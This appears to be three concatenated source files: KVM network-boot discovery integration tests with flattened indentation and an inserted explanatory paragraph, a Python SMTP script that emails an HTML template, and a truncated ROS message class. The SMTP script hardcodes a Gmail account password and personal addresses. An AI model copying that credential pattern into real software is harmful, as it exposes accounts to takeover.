for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine
self.assertEqual(len(interfaces), 1)
for i in interfaces:
self.assertEqual(i["name"], "eth0")
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
self.assertTrue(i["as_boot"])
self.write_ending(marker)
finally:
self.clean_up_virtual_machine(marker)
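The bounded polling loop above (`for i in range(60): ... break; time.sleep(...)`) recurs in every test in this suite. A generic helper capturing the pattern (illustrative only, not part of `kvm_player`):

```python
import time

# Poll a predicate with a bounded number of retries; return its first
# truthy result, or None if it never becomes truthy.
def wait_until(predicate, retries=60, delay=0.0):
    for _ in range(retries):
        result = predicate()
        if result:
            return result
        time.sleep(delay)
    return None

counter = {"n": 0}
def three_calls():
    counter["n"] += 1
    return counter["n"] if counter["n"] >= 3 else 0

assert wait_until(three_calls, retries=10, delay=0.0) == 3
assert wait_until(lambda: False, retries=3, delay=0.0) is None
```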
# @unittest.skip("just skip")
class TestKVMDiscoveryClient01(TestKVMDiscoveryClient):
"""
node_nb: 3
Interfaces
"""
def test_01(self):
nb_node = 3
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_01.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path
)
gen.dumps()
interfaces = {}
try:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
virt_install = [
"virt-install",
"--name",
"%s" % machine_marker,
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(nb_node),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
time.sleep(self.testing_sleep_seconds) # KVM fail to associate nic
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) == nb_node:
break
time.sleep(self.testing_sleep_seconds)
# Several machines
self.assertEqual(len(interfaces), nb_node)
for i in interfaces:
self.assertEqual(i["name"], "eth0")
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
self.assertTrue(i["as_boot"])
self.write_ending(marker)
finally:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient02(TestKVMDiscoveryClient):
"""
node_nb: 1
Interfaces
LLDP
"""
@classmethod
def setUpClass(cls):
cls.running_requirements()
cls.set_rack0()
cls.set_acserver()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.set_lldp()
cls.pause(cls.wait_setup_teardown)
def test_02(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_02.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
interfaces = []
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--memory=2048",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
self.assertEqual(len(interfaces), 1)
for interface in interfaces:
self.assertIsNotNone(interface["chassis_name"])
self.assertEqual(interface["name"], "eth0")
self.assertEqual(interface["netmask"], 16)
self.assertEqual(interface["ipv4"][:9], '172.20.0.')
self.assertEqual(len(interface["mac"]), 17)
self.assertTrue(interface["as_boot"])
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient03(TestKVMDiscoveryClient):
"""
node_nb: 3
Interfaces
LLDP
"""
@classmethod
def setUpClass(cls):
cls.running_requirements()
cls.set_rack0()
cls.set_acserver()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.set_lldp()
cls.pause(cls.wait_setup_teardown)

    def test_03(self):
        nb_node = 3
        marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_03.__name__)
        gen = generator.Generator(
            api_uri=self.api_uri,
            profile_id="%s" % marker,
            name="%s" % marker,
            ignition_id="%s.yaml" % marker,
            matchbox_path=self.test_matchbox_path,
            extra_metadata={
                "lldp_image_url": self.ec.lldp_image_url,
                "etc_hosts": self.ec.etc_hosts,
            }
        )
        gen.dumps()
        destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
        self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
        interfaces = []
        try:
            for i in range(nb_node):
                machine_marker = "%s-%d" % (marker, i)
                destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
                    ["virsh", "undefine", "%s" % machine_marker]
                self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
                virt_install = [
                    "virt-install",
                    "--name",
                    "%s" % machine_marker,
                    "--network=bridge:rack0,model=virtio",
                    "--memory=2048",
                    "--vcpus=%d" % self.get_optimized_cpu(1),
                    "--pxe",
                    "--disk",
                    "none",
                    "--os-type=linux",
                    "--os-variant=generic",
                    "--noautoconsole",
                    "--boot=network"
                ]
                self.virsh(virt_install, assertion=True, v=self.dev_null)
                time.sleep(self.testing_sleep_seconds)  # without a short pause, KVM sometimes fails to associate the NIC

            for i in range(60):
                interfaces = self.fetch_discovery_interfaces()
                if len(interfaces) == nb_node:
                    break
                time.sleep(self.testing_sleep_seconds)

            # Checks
            self.assertEqual(len(interfaces), 3)
            for interface in interfaces:
                self.assertIsNotNone(interface["chassis_name"])
                self.assertEqual(interface["name"], "eth0")
                self.assertEqual(interface["netmask"], 16)
                self.assertEqual(interface["ipv4"][:9], '172.20.0.')
                self.assertEqual(len(interface["mac"]), 17)
                self.assertTrue(interface["as_boot"])
            # Every node reports the same LLDP chassis name (the shared rack0 bridge)
            self.assertEqual(1, len(set([k["chassis_name"] for k in interfaces])))
            self.write_ending(marker)
        finally:
            if os.getenv("TEST"):
                self.iteractive_usage()
            for i in range(nb_node):
                machine_marker = "%s-%d" % (marker, i)
                destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
                    ["virsh", "undefine", "%s" % machine_marker]
                self.virsh(destroy)
                self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient04(TestKVMDiscoveryClient):
"""
Ignition Journal
"""
def test_04(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_04.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
disco_data = dict()
for i in range(60):
disco_data = self.fetch_discovery()
if disco_data and len(disco_data) == 1:
break
time.sleep(self.testing_sleep_seconds)
self.assertEqual(1, len(disco_data))
lines = self.fetch_discovery_ignition_journal(disco_data[0]["boot-info"]["uuid"])
self.assertIs(type(lines), list)
self.assertTrue(len(lines) > 0)
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient05(TestKVMDiscoveryClient):
"""
node_nb: 1 2 interfaces
Interfaces
"""
def test_05(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_05.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
interfaces = {}
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine but with 2 interfaces
self.assertEqual(len(interfaces), 2)
for i in interfaces:
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
try:
self.assertTrue(i["as_boot"])
except AssertionError:
self.assertFalse(i["as_boot"])
try:
self.assertEqual(i["name"], "eth0")
except AssertionError:
self.assertEqual(i["name"], "eth1")
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient06(TestKVMDiscoveryClient):
"""
node_nb: 3 with 4 interfaces
Interfaces
"""
def test_06(self):
nb_node = 3
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_06.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
interfaces = {}
try:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
virt_install = [
"virt-install",
"--name",
"%s" % machine_marker,
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(nb_node),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
time.sleep(self.testing_sleep_seconds) # KVM fail to associate nic
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) == nb_node * 4:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine but with 4 interfaces
self.assertEqual(len(interfaces), 4 * nb_node)
as_boot = 0
as_not_boot = 0
for i in interfaces:
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
try:
self.assertTrue(i["as_boot"])
as_boot += 1
except AssertionError:
self.assertFalse(i["as_boot"])
as_not_boot += 1
self.assertEqual(as_boot, nb_node)
self.assertEqual(as_not_boot, nb_node * 3)
self.write_ending(marker)
finally:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy)
self.virsh(undefine)
if __name__ == "__main__":
unittest.main(defaultTest=os.getenv("TEST"))

# ============================================================================
# PythonSMTP_HTML-Email.py
# From: itisaby/HacktoberFest2021 (MIT license)
# ============================================================================
import smtplib
import email.mime.application
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

from jinja2 import Environment

html = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td { color: #000000; } a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_15 .v-container-padding-padding { padding: 10px 10px 10px 20px !important; } }
@media only screen and (min-width: 620px) {
.u-row {
width: 600px !important;
}
.u-row .u-col {
vertical-align: top;
}
.u-row .u-col-100 {
width: 600px !important;
}
}
@media (max-width: 620px) {
.u-row-container {
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}
.u-row .u-col {
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}
.u-row {
width: calc(100% - 40px) !important;
}
.u-col {
width: 100% !important;
}
.u-col > div {
margin: 0 auto;
}
}
body {
margin: 0;
padding: 0;
}
table,
tr,
td {
vertical-align: top;
border-collapse: collapse;
}
p {
margin: 0;
}
.ie-container table,
.mso-container table {
table-layout: fixed;
}
* {
line-height: inherit;
}
a[x-apple-data-detectors='true'] {
color: inherit !important;
text-decoration: none !important;
}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Raleway:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #e7e7e7;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #e7e7e7;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #e7e7e7;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #e6a501;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #e6a501;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<h1 style="margin: 0px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word; font-weight: normal; font-family: 'Raleway',sans-serif; font-size: 22px;">
<strong><span style="color: blue;">IEM </span><span style="color: red;"> AI Writer </SPan></strong>
</h1>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<h1 style="margin: 0px; color: #ffffff; line-height: 110%; text-align: center; word-wrap: break-word; font-weight: normal; font-family: 'Raleway',sans-serif; font-size: 48px;">
<strong>Thank You</strong>
</h1>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<div style="line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%;">Generated Output : </p>
</div>
<br>
{{output}} <!-- OUTPUT -->
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:600px;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="600" style="width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table id="u_content_text_15" style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:20px 20px 15px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #333333; line-height: 160%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 160%;"><span style="font-size: 16px; line-height: 25.6px; font-family: Lato, sans-serif;">If you have any questions contact us with this link iemaiwriter.com</span></p>
<p style="font-size: 14px; line-height: 160%;"><span style="font-size: 16px; line-height: 25.6px; font-family: Lato, sans-serif;">FeedBack Form Link : https://forms.gle/NMEk78ZpoqW8SVc7A </span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="100%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 2px solid #939391;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:14px;font-family:'Open Sans',sans-serif;" align="left">
<div align="center">
<div style="display: table; max-width:187px;">
<!--[if (mso)|(IE)]><table width="187" cellpadding="0" cellspacing="0" border="0"><tr><td style="border-collapse:collapse;" align="center"><table width="100%" cellpadding="0" cellspacing="0" border="0" style="border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:187px;"><tr><![endif]-->
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #828080; line-height: 160%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 160%;">6408 Elizabeth Avenue SE</p>
<p style="font-size: 14px; line-height: 160%;">Auburn WA 98092, USA</p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:'Open Sans',sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="64%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:'Open Sans',sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td class="v-container-padding-padding" style="overflow-wrap:break-word;word-break:break-word;padding:0px 10px 20px;font-family:'Open Sans',sans-serif;" align="left">
<div style="color: #828080; line-height: 140%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%;">© 2021 IEM America Corporation. All Rights Reserved.</p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
"""
data = "Please find the generated output is Attached below"
html_part = MIMEText(
Environment().from_string(html).render(
output= data
), "html"
)
msg_alternative = MIMEMultipart('alternative')
msg_alternative.attach(html_part)
filename='Blog.txt'
fp=open(filename,'rb')
attachment = email.mime.application.MIMEApplication(fp.read(),_subtype="txt")
fp.close()
attachment.add_header('Content-Disposition', 'attachment', filename='Blog.txt')
msg_mixed = MIMEMultipart('mixed')
msg_mixed.attach(msg_alternative)
msg_mixed.attach(attachment)
msg_mixed['From'] = 'iemaiwriter@gmail.com'
msg_mixed['To'] = str(emaill)
msg_mixed['Subject'] = "|IEM AI Writer| " + modelCall.emailsub()
mailingList = [str(emaill), "iemaiwriter@gmail.com", "chakrabortyrishit96@gmail.com", "suryasekhardatta22@gmail.com"]
smtp_obj = smtplib.SMTP('smtp.gmail.com', 587)
smtp_obj.ehlo()
smtp_obj.starttls()
smtp_obj.ehlo()
smtp_obj.login('iemaiwriter@gmail.com', 'Test@12345')
for reciever in mailingList:
smtp_obj.sendmail(msg_mixed['From'], reciever, msg_mixed.as_string())
smtp_obj.quit()

# ============================================================================
# alpyro_msgs/tf2_msgs/lookuptransformactionresult.py
# From: rho2/alpyro_msgs (MIT license)
# ============================================================================

from typing import Final
from alpyro_msgs import RosMessage
from alpyro_msgs.actionlib_msgs.goalstatus import GoalStatus
from alpyro_msgs.std_msgs.header import Header
from alpyro_msgs.tf2_msgs.lookuptransformresult import LookupTransformResult


class LookupTransformActionResult(RosMessage):
    __msg_typ__ = "tf2_msgs/LookupTransformActionResult"
    __msg_def__ = "c3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogIHVpbnQzMiBzZXEKICB0aW1lIHN0YW1wCiAgc3RyaW5nIGZyYW1lX2lkCmFjdGlvbmxpYl9tc2dzL0dvYWxTdGF0dXMgc3RhdHVzCiAgdWludDggUEVORElORz0wCiAgdWludDggQUNUSVZFPTEKICB1aW50OCBQUkVFTVBURUQ9MgogIHVpbnQ4IFNVQ0NFRURFRD0zCiAgdWludDggQUJPUlRFRD00CiAgdWludDggUkVKRUNURUQ9NQogIHVpbnQ4IFBSRUVNUFRJTkc9NgogIHVpbnQ4IFJFQ0FMTElORz03CiAgdWludDggUkVDQUxMRUQ9OAogIHVpbnQ4IExPU1Q9OQogIGFjdGlvbmxpYl9tc2dzL0dvYWxJRCBnb2FsX2lkCiAgICB0aW1lIHN0YW1wCiAgICBzdHJpbmcgaWQKICB1aW50OCBzdGF0dXMKICBzdHJpbmcgdGV4dAp0ZjJfbXNncy9Mb29rdXBUcmFuc2Zvcm1SZXN1bHQgcmVzdWx0CiAgZ2VvbWV0cnlfbXNncy9UcmFuc2Zvcm1TdGFtcGVkIHRyYW5zZm9ybQogICAgc3RkX21zZ3MvSGVhZGVyIGhlYWRlcgogICAgICB1aW50MzIgc2VxCiAgICAgIHRpbWUgc3RhbXAKICAgICAgc3RyaW5nIGZyYW1lX2lkCiAgICBzdHJpbmcgY2hpbGRfZnJhbWVfaWQKICAgIGdlb21ldHJ5X21zZ3MvVHJhbnNmb3JtIHRyYW5zZm9ybQogICAgICBnZW9tZXRyeV9tc2dzL1ZlY3RvcjMgdHJhbnNsYXRpb24KICAgICAgICBmbG9hdDY0IHgKICAgICAgICBmbG9hdDY0IHkKICAgICAgICBmbG9hdDY0IHoKICAgICAgZ2VvbWV0cnlfbXNncy9RdWF0ZXJuaW9uIHJvdGF0aW9uCiAgIC